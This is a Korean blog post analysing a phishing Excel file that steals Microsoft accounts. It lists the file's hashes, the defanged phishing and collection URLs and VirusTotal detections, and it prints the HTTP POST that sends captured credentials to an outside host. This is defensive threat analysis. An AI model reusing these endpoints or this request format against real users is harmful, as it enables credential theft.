꿈을꾸는 파랑새

오늘은 피싱(Phishing)개인정보(Private data)를 낚는다(Fishing)는 의미의 합성어로 간단하게 이야기하면 공신력 있는 사이트라고 속여서 개인정보를 수집해 가는 악성 행위 중 하나입니다. 마이크로소프트 계정 훔치기 위한 피싱 엑셀 문서인 Statement001.xlsx에 대해 글을 적어 보겠습니다.
먼저 해당 악성코드 해쉬값은 다음과 같습니다.
파일명:Excel Statement001.xlsx
사이즈:124 KB
CRC32:ff54a91e
MD5:0c2064fef98c4c647bb325827a2e2576
SHA-1:af4dcff799c5233aa28f950c11b938e32e4f49b9
SHA-256:58e6856571868d55dbfd636710ac2590c574589c7609402d5f7cdba17ba78653
SHA-512:548d6b7850b398dc02f9ff5d457e12344ddf7add5cb16cebdd75d7cbe5abe305fca73973857967ef30817f055453c9c1d81af11879647d37454b5012d0129554
일단 해당 엑셀을 실행하고 나며 어도비 리더 같은 그림이 있는 View 를 통해서 해당 피싱 사이트로 이동을 합니다.
피싱 사이트 주소는 다음과 같습니다.

https://gripaco(.)gr/e-doc.html

Statement001 엑셀 실행
Statement001 엑셀 실행

이며 접속을 해 보면 마이크로소프트 계정을 통해서 오피스를 접속을 하게 돼 있으나 실상은 피싱 사이트 이며 다음 주소를 통해서 개인정보를 전송합니다.

피싱 사이트 화면
피싱 사이트 화면

https://resourcesxerox(.)com/gh05t/reform/def.php

HTTP Debugger Pro 본 개인정보 전송
HTTP Debugger Pro 본 개인정보 전송

더 자세하게 이야기하면 다음과 같습니다.

POST /gh05t/reform/def(.)php HTTP/1.1
Host: resourcesxerox(.)com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
Prefer: safe
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://gripaco(.)gr
DNT: 1
Connection: keep-alive
Referer: https://gripaco(.)gr/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Accept-Encoding: gzip, deflate
Content-Length: 32
ai=test%40test(.)com&pr=test123124

2023-03-27 18:44:43 UTC 기준으로 바이러스토탈(VirusTotal)에서는 다음과 같이 해당 피싱 문서를 탐지하고 있습니다.
Antiy-AVL:Trojan[Phishing]/MSOffice.Agent
Arcabit:Trojan.Generic.D3EF9E3B
Avast:Other:Malware-gen [Trj]
AVG:Other:Malware-gen [Trj]
Avira (no cloud)PHISH/MSDoc.uytna
BitDefender:Trojan.GenericKD.66035259
Cynet:Malicious (score: 99)
Emsisoft:Trojan.GenericKD.66035259 (B)
eScan:Trojan.GenericKD.66035259
ESET-NOD32:DOC/Phishing.Agent.TA
GData:Trojan.GenericKD.66035259
Google:Detected
Ikarus:Phishing.Office.Doc
Kaspersky:HEUR:Hoax.MSOffice.Phish.gen
Lionic:Hacktool.MSExcel.Phish.3!c
MAX:Malware (ai Score=84)
McAfee-GW-Edition:Artemis
Tencent:Trojan.Win32.Office_Dl.11026087
Trellix (FireEye):Trojan.GenericKD.66035259
VIPRE:Trojan.GenericKD.66035259
ZoneAlarm by Check Point:HEUR:Hoax.MSOffice.Phish.gen
해당 피싱 사이트들도 기본적으로 잘 탐지 하고 있기 때문에 기본적으로 브라우저에서 제공하는 보안 기능과 그리고 백신 프로그램(안티바이러스)에서 사용을 하는 피싱 사이트 차단기능을 사용하고 항상 최신 업데이트로 유지하는 습관을 가지면 어느 정도 피해는 줄일 수가 있습니다.

그리드형

공유하기

facebook twitter kakaoTalk kakaostory naver band